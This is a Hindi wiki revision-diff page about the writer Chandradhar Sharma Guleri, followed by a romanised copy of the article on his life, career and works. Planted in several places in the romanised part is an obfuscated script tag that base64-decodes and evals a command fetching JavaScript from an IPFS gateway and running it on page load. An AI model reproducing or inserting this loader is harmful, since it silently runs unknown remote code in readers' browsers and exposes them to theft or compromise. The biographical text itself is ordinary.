Difference between revisions of "चन्द्रधर शर्मा गुलेरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " सन " to " सन् ")
Line 1: Line 1:
चन्द्रधर शर्मा गुलेरी (जन्म-[[1883]] गुलेर ज़िला [[कांगड़ा]], मृत्यु- [[12 सितम्बर]], [[1922]] काशी) हिन्दी साहित्य के प्रख्यात साहित्यकार थे।
+
{{सूचना बक्सा साहित्यकार
 +
|चित्र=Chandradhar-sharma-guleri.jpg
 +
|पूरा नाम=चन्द्रधर शर्मा 'गुलेरी'
 +
|अन्य नाम=
 +
|जन्म= 7 जुलाई, [[1883]]
 +
|जन्म भूमि=गुलेर गाँव, [[कांगड़ा]]
 +
|अविभावक=
 +
|पति/पत्नी=
 +
|संतान=
 +
|कर्म भूमि=
 +
|कर्म-क्षेत्र=यशस्वी कथाकार
 +
|मृत्यु=[[12 सितम्बर]] सन् [[1922]]
 +
|मृत्यु स्थान=[[काशी]], [[उत्तर प्रदेश]]
 +
|मुख्य रचनाएँ=उसने कहा था, बुद्धू का काँटा, द जयपुर ऑब्ज़रवेटरी एण्ड इट्स बिल्डर्स आदि
 +
|विषय= 
 +
|भाषा=[[संस्कृत]], [[हिन्दी]], [[अंग्रेज़ी]], [[पालि भाषा|पालि]], [[प्राकृत]], [[मराठी भाषा|मराठी]], [[बांग्ला भाषा|बंगला]], लैटिन, फ़्रैंच, जर्मन आदि भाषाओं का ज्ञान था।
 +
|विद्यालय=
 +
|शिक्षा=
 +
|पुरस्कार-उपाधि=नागरी प्रचारिणी सभा के सभापति, अनेक प्रतिष्ठित पुरस्कार एवं सम्मान‎ से सम्मानित
 +
|प्रसिद्धि=उन्हें अमर कहानी ‘उसने कहा था’ के रचनाकार के रूप में अधिक जना जाता है।
 +
|विशेष योगदान=मासिक पत्र ‘समालोचक’ के सम्पादन
 +
|नागरिकता=भारतीय
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
चन्द्रधर शर्मा गुलेरी ([[अंग्रेज़ी]]: ''Chandradhar Sharma Guleri'', जन्म- [[7 जुलाई]], [[1883]] [[कांगड़ा]], मृत्यु- [[12 सितम्बर]], [[1922]]) हिन्दी साहित्य के प्रख्यात साहित्यकार थे। उन्होंने अंग्रेज़ी शिक्षा भी प्राप्त की और प्रथम श्रेणी में उत्तीर्ण होते रहे। [[कलकत्ता विश्वविद्यालय]] से एफ. ए. (प्रथम श्रेणी में द्वितीय और प्रयाग विश्वविद्यालय से बी. ए. (प्रथम श्रेणी में प्रथम) करने के बाद चाहते हुए भी वे आगे की पढ़ाई परिस्थितिवश जारी न रख पाए हालाँकि उनके स्वाध्याय और लेखन का क्रम अबाध रूप से चलता रहा। बीस वर्ष की उम्र के पहले ही उन्हें जयपुर की वेधशाला के जीर्णोद्धार तथा उससे सम्बन्धित शोधकार्य के लिए गठित मण्डल में चुन लिया गया था और कैप्टन गैरेट के साथ मिलकर उन्होंने "द जयपुर ऑब्ज़रवेटरी एण्ड इट्स बिल्डर्स" शीर्षक अँग्रेज़ी ग्रन्थ की रचना की।
 
==जीवन परिचय==
 
==जीवन परिचय==
 
{{tocright}}
 
{{tocright}}
चन्द्रधर शर्मा गुलेरी का जन्म 1883 ई. गुलेर ज़िला कांगड़ा में हुआ था। उनके पिता [[संस्कृत]] के प्रसिद्ध पंडित शिवराम [[जयपुर]] नरेश के राजदरबार में थे। जब गुलेरी जी दस वर्ष के ही थे कि इन्होंने एक बार संस्कृत में भाषण देकर [[भारत]] [[धर्म]] महामंडल के विद्वानों को आश्चर्य चकित कर दिया था। पंडित कीर्तिधर शर्मा गुलेरी का यहाँ तक कहना था कि वे पाँच वर्ष में [[अंग्रेज़ी]] का टैलीग्राम अच्छी तरह पढ़ लेते थे। चन्द्रधर ने सभी परीक्षाएँ प्रथम श्रेणी से उत्तीर्ण की। चन्द्रधर बी.ए. की परीक्षा में सर्वप्रथम रहे। सन् [[1904]] ई. में गुलेरी जी मेयो कॉलेज [[अजमेर]] में अध्यापक के रूप में कार्य करने लगे। चन्द्रधर का अध्यापक के रूप में उनका बड़ा मान-सम्मान था। अपने शिष्यों में चन्द्रधर लोकप्रिय तो थे ही इसके साथ अनुशासन और नियमों का वे सख्ती से अनुपालन करते थे। उनकी असाधारण योग्यता से प्रभावित होकर [[पंडित मदनमोहन मालवीय]] ने उन्हें [[बनारस]] बुला भेजा और हिंन्दू विश्वविद्यालय में प्रोफेसर का पद दिलाया।<ref name="चन्द्रधर शर्मा गुलेरी">{{cite web |url=http://hindipatal.com/%E0%A4%95%E0%A4%B9%E0%A4%BE%E0%A4%A8%E0%A4%BF%E0%A4%AF%E0%A4%BE%E0%A4%81/%E0%A4%9A%E0%A4%A8%E0%A5%8D%E0%A4%A6%E0%A5%8D%E0%A4%B0%E0%A4%A7%E0%A4%B0-%E0%A4%B6%E0%A4%B0%E0%A5%8D%E0%A4%AE%E0%A4%BE-%E0%A4%97%E0%A5%81%E0%A4%B2%E0%A5%87%E0%A4%B0%E0%A5%80/ |title=चन्द्रधर शर्मा गुलेरी |accessmonthday=[[20 जून]] |accessyear=[[2011]] |last= |first= |authorlink= |format= |publisher=हिन्दी पटल – हिन्दी की उत्कृष्ट रचनाओं का उत्तम संग्रह |language=[[हिन्दी]]}}</ref>  
+
चन्द्रधर शर्मा गुलेरी का जन्म 7 जुलाई, 1883 ई. गुलेर गाँव, [[कांगड़ा]] ([[हिमाचल प्रदेश]]) में हुआ था। उनके पिता [[संस्कृत]] के प्रसिद्ध पंडित शिवराम [[जयपुर]] नरेश के राजदरबार में थे। जब गुलेरी जी दस वर्ष के ही थे कि इन्होंने एक बार संस्कृत में भाषण देकर [[भारत]] [[धर्म]] महामंडल के विद्वानों को आश्चर्य चकित कर दिया था। पंडित कीर्तिधर शर्मा गुलेरी का यहाँ तक कहना था कि वे पाँच वर्ष में [[अंग्रेज़ी]] का टैलीग्राम अच्छी तरह पढ़ लेते थे। चन्द्रधर ने सभी परीक्षाएँ प्रथम श्रेणी से उत्तीर्ण की। चन्द्रधर बी.ए. की परीक्षा में सर्वप्रथम रहे। सन् [[1904]] ई. में गुलेरी जी मेयो कॉलेज [[अजमेर]] में अध्यापक के रूप में कार्य करने लगे। चन्द्रधर का अध्यापक के रूप में उनका बड़ा मान-सम्मान था। अपने शिष्यों में चन्द्रधर लोकप्रिय तो थे ही इसके साथ अनुशासन और नियमों का वे सख्ती से अनुपालन करते थे। उनकी असाधारण योग्यता से प्रभावित होकर [[पंडित मदनमोहन मालवीय]] ने उन्हें [[बनारस]] बुला भेजा और [[बनारस हिन्दू विश्वविद्यालय|हिन्दू विश्वविद्यालय]] में प्रोफेसर का पद दिलाया।<ref name="चन्द्रधर शर्मा गुलेरी">{{cite web |url=http://hindipatal.com/%E0%A4%95%E0%A4%B9%E0%A4%BE%E0%A4%A8%E0%A4%BF%E0%A4%AF%E0%A4%BE%E0%A4%81/%E0%A4%9A%E0%A4%A8%E0%A5%8D%E0%A4%A6%E0%A5%8D%E0%A4%B0%E0%A4%A7%E0%A4%B0-%E0%A4%B6%E0%A4%B0%E0%A5%8D%E0%A4%AE%E0%A4%BE-%E0%A4%97%E0%A5%81%E0%A4%B2%E0%A5%87%E0%A4%B0%E0%A5%80/ |title=चन्द्रधर शर्मा गुलेरी |accessmonthday=[[20 जून]] |accessyear=[[2011]] |last= |first= |authorlink= |format= |publisher=हिन्दी पटल – हिन्दी की उत्कृष्ट रचनाओं का उत्तम संग्रह |language=[[हिन्दी]]}}</ref>  
==भाषा विशेषज्ञ==
+
==कार्यक्षेत्र==
प्रतिभा के धनी चन्द्रधर शर्मा गुलेरी ने अपने अभ्यास से [[संस्कृत]], [[हिन्दी]], [[अंग्रेज़ी]], [[पालि भाषा|पालि]], [[प्राकृत]] और [[अपभ्रंश]] भाषाओं पर असाधारण अधिकार प्राप्त किया। उन्हें [[मराठी भाषा|मराठी]], [[बांग्ला भाषा|बंगला]], लैटिन, फ़्रैंच, जर्मन आदि भाषाओं की भी अच्छी जानकारी थी। उनके अध्ययन का क्षेत्र बहुत विस्तृत था। [[साहित्य]], [[दर्शन शास्त्र|दर्शन]], भाषा विज्ञान, प्राचीन भारतीय इतिहास और पुरातत्त्व ज्योतिष सभी विषयों के वे विद्वान थे। इनमें से कोई विषय ऐसा नहीं था, जिस पर गुलेरी जी ने साधिकार लिखा न हो। वे अपनी रचनाओं में स्थल-स्थल पर [[वेद]], [[उपनिषद]], सूत्र, [[पुराण]], [[रामायण]], [[महाभारत]] के संदर्भों का संकेत दिया करते थे। इसीलिए इन ग्रन्थों से परिचित पाठक ही उनकी रचनाओं को भली-भाँति समझ सकता था। ग्रन्थ रचना की अपेक्षा स्फुट के रूप में ही उन्होंने अधिक साहित्य सृजन किया।<ref name="भारतीय चरित कोश">{{cite book | last =लीलाधर | first =शर्मा | title =भारतीय चरित कोश | edition = | publisher =शिक्षा भारती | location =भारतडिस्कवरी पुस्तकालय | language =[[हिन्दी]] | pages =264| chapter = }}</ref>
+
अपने अध्ययन काल में ही उन्होंने सन् 1900 में जयपुर में नगरी मंच की स्थापना में योगदान दिया और सन् 1902 से मासिक पत्र ‘समालोचक’ के सम्पादन का भार भी सँभाला। प्रसंगवश कुछ वर्ष [[काशी]] की [[नागरी प्रचारिणी सभा]] के सम्पादक मंडल में भी उन्हें सम्मिलित किया गया। उन्होंने देवी प्रसाद ऐतिहासिक पुस्तकमाला और सूर्य कुमारी पुस्तकमाला का सम्पादन किया और नागरी प्रचारिणी पुस्तकमाला और सूर्य कुमारी पुस्तकमाला का सम्पादन किया और नागरी प्रचारिणी सभा के सभापति भी रहे। [[जयपुर]] के राजपण्डित के कुल में जन्म लेने वाले गुलेरी जी का राजवंशों से घनिष्ठ सम्बन्ध रहा। वे पहले खेतड़ी नरेश जयसिंह के और फिर जयपुर राज्य के सामन्त-पुत्रों के अजमेर के मेयो कॉलेज में अध्ययन के दौरान उनके अभिभावक रहे। सन् 1916 में उन्होंने मेयो कॉलेज में ही संस्कृत विभाग के अध्यक्ष का पद सँभाला। सन् 1920 में [[मदन मोहन मालवीय|पं. मदन मोहन मालवीय]] के प्रबंध आग्रह के कारण उन्होंने बनारस आकर [[काशी हिन्दू विश्वविद्यालय]] के प्राच्यविद्या विभाग के प्राचार्य और फिर 1922 में प्राचीन इतिहास और धर्म से सम्बद्ध मनीन्द्र चन्द्र नन्दी पीठ के प्रोफेसर का कार्यभार भी ग्रहण किया। इस बीच परिवार में अनेक दुखद घटनाओं के आघात भी उन्हें झेलने पड़े।
 
==कृतियाँ==
 
==कृतियाँ==
 +
निबंधकार के रूप में भी चंद्रधर जी बडे प्रसिद्ध रहे हैं। इन्होंने सौ से अधिक निबंध लिखे हैं। सन् [[1903]] ई. में [[जयपुर]] से [[जैन]] वैद्य के माध्यम से समालोचक पत्र प्रकाशित होना शुरू हुआ था जिसके वे संपादक रहे। इन्होंने पूरे मनोयोग से समालोचक में अपने निबंध और टिप्पणियाँ देकर जीवंत बनाए रखा। चंद्रधर के निबंध विषय अधिकतर - इतिहास, [[दर्शन शास्त्र|दर्शन]], [[धर्म]], मनोविज्ञान और पुरातत्त्व संबंधी ही हैं।
 +
{| class="bharattable-purple"
 +
|+ चंद्रधर शर्मा गुलेरी की रचनाएँ
 +
|-
 +
|
 
;निबंध
 
;निबंध
निबंधकार के रूप में भी चंद्रधर जी बडे प्रसिद्ध रहे हैं। इन्होंने सौ से अधिक निबंध लिखे हैं। सन् [[1903]] ई. में [[जयपुर]] से [[जैन]] वैद्य के माध्यम से समालोचक पत्र प्रकाशित होना शुरू हुआ था जिसके वे संपादक रहे। इन्होंने पूरे मनोयोग से समालोचक में अपने निबंध और टिप्पणियाँ देकर जीवंत बनाए रखा। चंद्रधर के निबंध विषय अधिकतर - इतिहास, [[दर्शन शास्त्र|दर्शन]], [[धर्म]], मनोविज्ञान और पुरातत्त्व संबंधी ही हैं।
 
 
 
*शैशुनाक की मूर्तियाँ  
 
*शैशुनाक की मूर्तियाँ  
 
*देवकुल
 
*देवकुल
Line 16: Line 50:
 
*आँख
 
*आँख
 
*मोरेसि मोहिं कुठाऊँ  
 
*मोरेसि मोहिं कुठाऊँ  
*सोहम आदि जैसे निबंधों पर उनकी विद्वता की अमिट छाप मौजूद है।
+
|
 
;कविताएँ
 
;कविताएँ
 
*एशिया की विजय दशमी  
 
*एशिया की विजय दशमी  
Line 26: Line 60:
 
*रवि
 
*रवि
 
*ईश्वर से प्रार्थना  
 
*ईश्वर से प्रार्थना  
*सुनीति आदि इनकी कतिपय श्रेष्ठ कविताएँ हैं। ये कविताएँ गुलेरी विषयक संपादित गंथों में संकलित हैं।
+
|
 
;कहानी संग्रह  
 
;कहानी संग्रह  
 
*उसने कहा था
 
*उसने कहा था
 
*सुखमय जीवन
 
*सुखमय जीवन
 
*बुद्धु का काँटा<ref name="चन्द्रधर शर्मा गुलेरी" />
 
*बुद्धु का काँटा<ref name="चन्द्रधर शर्मा गुलेरी" />
 +
|}
 +
==भाषा विशेषज्ञ==
 +
प्रतिभा के धनी चन्द्रधर शर्मा गुलेरी ने अपने अभ्यास से [[संस्कृत]], [[हिन्दी]], [[अंग्रेज़ी]], [[पालि भाषा|पालि]], [[प्राकृत]] और [[अपभ्रंश]] भाषाओं पर असाधारण अधिकार प्राप्त किया। उन्हें [[मराठी भाषा|मराठी]], [[बांग्ला भाषा|बंगला]], लैटिन, फ़्रैंच, जर्मन आदि भाषाओं की भी अच्छी जानकारी थी। उनके अध्ययन का क्षेत्र बहुत विस्तृत था। [[साहित्य]], [[दर्शन शास्त्र|दर्शन]], भाषा विज्ञान, प्राचीन भारतीय इतिहास और पुरातत्त्व ज्योतिष सभी विषयों के वे विद्वान थे। इनमें से कोई विषय ऐसा नहीं था, जिस पर गुलेरी जी ने साधिकार लिखा न हो। वे अपनी रचनाओं में स्थल-स्थल पर [[वेद]], [[उपनिषद]], सूत्र, [[पुराण]], [[रामायण]], [[महाभारत]] के संदर्भों का संकेत दिया करते थे। इसीलिए इन ग्रन्थों से परिचित पाठक ही उनकी रचनाओं को भली-भाँति समझ सकता था। ग्रन्थ रचना की अपेक्षा स्फुट के रूप में ही उन्होंने अधिक साहित्य सृजन किया।<ref name="भारतीय चरित कोश">{{cite book | last =लीलाधर | first =शर्मा | title =भारतीय चरित कोश | edition = | publisher =शिक्षा भारती | location =भारतडिस्कवरी पुस्तकालय | language =[[हिन्दी]] | pages =264| chapter = }}</ref>
 +
==शोधपरक लेखन==
 +
अपने 39 वर्ष के संक्षिप्त जीवनकाल में गुलेरी जी ने किसी स्वतन्त्र ग्रन्थ की रचना तो नहीं कि किन्तु फुटकर रूप में बहुत लिखा, अनगिनत विषयों पर लिखा और अनेक विधाओं की विशेषताओं और रूपों को समेटते-समंजित करते हुए लिखा। उनके लेखन का एक बड़ा हिस्सा जहाँ विशुद्ध अकादमिक अथवा शोधपरक है, उनकी शास्त्रज्ञता तथा पाण्डित्य का परिचायक है; वहीं, उससे भी बड़ा हिस्सा उनके खुले दिमाग, मानवतावादी दृष्टि और समकालीन समाज, धर्म राजनीति आदि से गहन सरोकार का परिचय देता है। लोक से यह सरोकार उनकी ‘पुरानी हिन्दी’ जैसी अकादमिक और ‘महर्षि च्यवन का रामायण’ जैसी शोधपरक रचनाओं तक में दिखाई देता है। इन बातों के अतिरिक्त गुलेरी जी के विचारों की आधुनिकता भी हमसे आज उनके पुराविष्कार की माँग करती है। मात्र 39 वर्ष की जीवन-अवधि को देखते हुए गुलेरी जी के लेखन का परिमाण और उनकी विषय-वस्तु तथा विधाओं का वैविध्य सचमुच विस्मयकर है। उनकी रचनाओं में कहानियाँ कथाएँ, आख्यान, ललित निबन्ध, गम्भीर विषयों पर विवेचनात्मक निबन्ध, शोधपत्र, समीक्षाएँ, सम्पादकीय टिप्पणियाँ, पत्र विधा में लिखी टिप्पणियाँ, समकालीन साहित्य, समाज, राजनीति, धर्म, विज्ञान, कला आदि पर लेख तथा वक्तव्य, वैदिक/पौराणिक साहित्य, पुरातत्त्व, भाषा आदि पर प्रबन्ध, लेख तथा टिप्पणियाँ-सभी शामिल हैं।
 
==ख्याति ==
 
==ख्याति ==
चन्द्रधर शर्मा गुलेरी की [[हिन्दी साहित्य]] में सबसे अधिक ख्याति [[1915]] में ‘सरस्वती’ मासिक में प्रकाशित कहानी ‘उसने कहा था’ के कारण हुई। यह कहानी शिल्प और विषय-वस्तु की [[दृष्टि]] से आज भी ‘मील का पत्थर’ मानी जाती है।<ref name="भारतीय चरित कोश" />  
+
चन्द्रधर शर्मा गुलेरी की [[हिन्दी साहित्य]] में सबसे अधिक ख्याति [[1915]] में ‘[[सरस्वती (पत्रिका)|सरस्वती]]’ मासिक में प्रकाशित कहानी ‘उसने कहा था’ के कारण हुई। यह कहानी शिल्प और विषय-वस्तु की [[दृष्टि]] से आज भी ‘मील का पत्थर’ मानी जाती है।<ref name="भारतीय चरित कोश" />  
 
==मृत्यु==
 
==मृत्यु==
 
चन्द्रधर शर्मा गुलेरी की मृत्यु [[12 सितम्बर]] [[1922]] ई. में [[काशी]] में हुई।<ref name="चन्द्रधर शर्मा गुलेरी" />
 
चन्द्रधर शर्मा गुलेरी की मृत्यु [[12 सितम्बर]] [[1922]] ई. में [[काशी]] में हुई।<ref name="चन्द्रधर शर्मा गुलेरी" />
Line 38: Line 77:
  
  
{{प्रचार}}
+
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध=}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3 |माध्यमिक= |पूर्णता= |शोध=}}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Revision as of 09:32, 21 January 2013

chandradhar sharma guleri
poora nam chandradhar sharma 'guleri'
janm 7 julaee, 1883
janm bhoomi guler gaanv, kaang da
mrityu 12 sitambar sanh 1922
mrityu sthan kashi, uttar pradesh
karm-kshetr yashasvi kathakar
mukhy rachanaean usane kaha tha, buddhoo ka kaanta, d jayapur aaubzaravetari end its bildars adi
bhasha sanskrit, hindi, aangrezi, pali, prakrit, marathi, bangala, laitin, fraianch, jarman adi bhashaoan ka jnan tha.
puraskar-upadhi nagari pracharini sabha ke sabhapati, anek pratishthit puraskar evan samman‎ se sammanit
prasiddhi unhean amar kahani ‘usane kaha tha’ ke rachanakar ke roop mean adhik jana jata hai.
vishesh yogadan masik patr ‘samalochak’ ke sampadan
nagarikata bharatiy
inhean bhi dekhean kavi soochi, sahityakar soochi

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

chandradhar sharma guleri (aangrezi: Chandradhar Sharma Guleri, janm- 7 julaee, 1883 kaang da, mrityu- 12 sitambar, 1922) hindi sahity ke prakhyat sahityakar the. unhoanne aangrezi shiksha bhi prapt ki aur pratham shreni mean uttirn hote rahe. kalakatta vishvavidyalay se eph. e. (pratham shreni mean dvitiy aur prayag vishvavidyalay se bi. e. (pratham shreni mean pratham) karane ke bad chahate hue bhi ve age ki padhaee paristhitivash jari n rakh pae halaanki unake svadhyay aur lekhan ka kram abadh roop se chalata raha. bis varsh ki umr ke pahale hi unhean jayapur ki vedhashala ke jirnoddhar tatha usase sambandhit shodhakary ke lie gathit mandal mean chun liya gaya tha aur kaiptan gairet ke sath milakar unhoanne "d jayapur aaubzaravetari end its bildars" shirshak aangrezi granth ki rachana ki.

jivan parichay

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

chandradhar sharma guleri ka janm 7 julaee, 1883 ee. guler gaanv, kaang da (himachal pradesh) mean hua tha. unake pita sanskrit ke prasiddh pandit shivaram jayapur naresh ke rajadarabar mean the. jab guleri ji das varsh ke hi the ki inhoanne ek bar sanskrit mean bhashan dekar bharat dharm mahamandal ke vidvanoan ko ashchary chakit kar diya tha. pandit kirtidhar sharma guleri ka yahaan tak kahana tha ki ve paanch varsh mean aangrezi ka tailigram achchhi tarah padh lete the. chandradhar ne sabhi parikshaean pratham shreni se uttirn ki. chandradhar bi.e. ki pariksha mean sarvapratham rahe. sanh 1904 ee. mean guleri ji meyo k aaulej ajamer mean adhyapak ke roop mean kary karane lage. chandradhar ka adhyapak ke roop mean unaka b da man-samman tha. apane shishyoan mean chandradhar lokapriy to the hi isake sath anushasan aur niyamoan ka ve sakhti se anupalan karate the. unaki asadharan yogyata se prabhavit hokar pandit madanamohan malaviy ne unhean banaras bula bheja aur hindoo vishvavidyalay mean prophesar ka pad dilaya.[1]

karyakshetr

apane adhyayan kal mean hi unhoanne sanh 1900 mean jayapur mean nagari manch ki sthapana mean yogadan diya aur sanh 1902 se masik patr ‘samalochak’ ke sampadan ka bhar bhi sanbhala. prasangavash kuchh varsh kashi ki nagari pracharini sabha ke sampadak mandal mean bhi unhean sammilit kiya gaya. unhoanne devi prasad aitihasik pustakamala aur soory kumari pustakamala ka sampadan kiya aur nagari pracharini pustakamala aur soory kumari pustakamala ka sampadan kiya aur nagari pracharini sabha ke sabhapati bhi rahe. jayapur ke rajapandit ke kul mean janm lene vale guleri ji ka rajavanshoan se ghanishth sambandh raha. ve pahale khet di naresh jayasianh ke aur phir jayapur rajy ke samant-putroan ke ajamer ke meyo k aaulej mean adhyayan ke dauran unake abhibhavak rahe. sanh 1916 mean unhoanne meyo k aaulej mean hi sanskrit vibhag ke adhyaksh ka pad sanbhala. sanh 1920 mean pan. madan mohan malaviy ke prabandh agrah ke karan unhoanne banaras akar kashi hindoo vishvavidyalay ke prachyavidya vibhag ke prachary aur phir 1922 mean prachin itihas aur dharm se sambaddh manindr chandr nandi pith ke prophesar ka karyabhar bhi grahan kiya. is bich parivar mean anek dukhad ghatanaoan ke aghat bhi unhean jhelane p de.

kritiyaan

nibandhakar ke roop mean bhi chandradhar ji bade prasiddh rahe haian. inhoanne sau se adhik nibandh likhe haian. sanh 1903 ee. mean jayapur se jain vaidy ke madhyam se samalochak patr prakashit hona shuroo hua tha jisake ve sanpadak rahe. inhoanne poore manoyog se samalochak mean apane nibandh aur tippaniyaan dekar jivant banae rakha. chandradhar ke nibandh vishay adhikatar - itihas, darshan, dharm, manovijnan aur puratattv sanbandhi hi haian.

chandradhar sharma guleri ki rachanaean
nibandh
  • shaishunak ki moortiyaan
  • devakul
  • purani hindi
  • sangit
  • kachchhua dharm
  • aankh
  • moresi mohian kuthaooan
kavitaean
  • eshiya ki vijay dashami
  • bharat ki jay
  • ven aauk barn
  • ahitagni
  • jhuki kaman
  • svagat
  • ravi
  • eeshvar se prarthana
kahani sangrah
  • usane kaha tha
  • sukhamay jivan
  • buddhu ka kaanta[1]

bhasha visheshajn

pratibha ke dhani chandradhar sharma guleri ne apane abhyas se sanskrit, hindi, aangrezi, pali, prakrit aur apabhransh bhashaoan par asadharan adhikar prapt kiya. unhean marathi, bangala, laitin, fraianch, jarman adi bhashaoan ki bhi achchhi janakari thi. unake adhyayan ka kshetr bahut vistrit tha. sahity, darshan, bhasha vijnan, prachin bharatiy itihas aur puratattv jyotish sabhi vishayoan ke ve vidvan the. inamean se koee vishay aisa nahian tha, jis par guleri ji ne sadhikar likha n ho. ve apani rachanaoan mean sthal-sthal par ved, upanishad, sootr, puran, ramayan, mahabharat ke sandarbhoan ka sanket diya karate the. isilie in granthoan se parichit pathak hi unaki rachanaoan ko bhali-bhaanti samajh sakata tha. granth rachana ki apeksha sphut ke roop mean hi unhoanne adhik sahity srijan kiya.[2]

shodhaparak lekhan

apane 39 varsh ke sankshipt jivanakal mean guleri ji ne kisi svatantr granth ki rachana to nahian ki kintu phutakar roop mean bahut likha, anaginat vishayoan par likha aur anek vidhaoan ki visheshataoan aur roopoan ko sametate-samanjit karate hue likha. unake lekhan ka ek b da hissa jahaan vishuddh akadamik athava shodhaparak hai, unaki shastrajnata tatha pandity ka parichayak hai; vahian, usase bhi b da hissa unake khule dimag, manavatavadi drishti aur samakalin samaj, dharm rajaniti adi se gahan sarokar ka parichay deta hai. lok se yah sarokar unaki ‘purani hindi’ jaisi akadamik aur ‘maharshi chyavan ka ramayan’ jaisi shodhaparak rachanaoan tak mean dikhaee deta hai. in batoan ke atirikt guleri ji ke vicharoan ki adhunikata bhi hamase aj unake puravishkar ki maang karati hai. matr 39 varsh ki jivan-avadhi ko dekhate hue guleri ji ke lekhan ka pariman aur unaki vishay-vastu tatha vidhaoan ka vaividhy sachamuch vismayakar hai. unaki rachanaoan mean kahaniyaan kathaean, akhyan, lalit nibandh, gambhir vishayoan par vivechanatmak nibandh, shodhapatr, samikshaean, sampadakiy tippaniyaan, patr vidha mean likhi tippaniyaan, samakalin sahity, samaj, rajaniti, dharm, vijnan, kala adi par lekh tatha vaktavy, vaidik/pauranik sahity, puratattv, bhasha adi par prabandh, lekh tatha tippaniyaan-sabhi shamil haian.

khyati

chandradhar sharma guleri ki hindi sahity mean sabase adhik khyati 1915 mean ‘sarasvati’ masik mean prakashit kahani ‘usane kaha tha’ ke karan huee. yah kahani shilp aur vishay-vastu ki drishti se aj bhi ‘mil ka patthar’ mani jati hai.[2]

mrityu

chandradhar sharma guleri ki mrityu 12 sitambar 1922 ee. mean kashi mean huee.[1]



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. 1.0 1.1 1.2 chandradhar sharma guleri (hindi) hindi patal – hindi ki utkrisht rachanaoan ka uttam sangrah. abhigaman tithi: 20 joon, 2011.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. 2.0 2.1 liladhar, sharma bharatiy charit kosh (hindi). bharatadiskavari pustakalay: shiksha bharati, 264.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>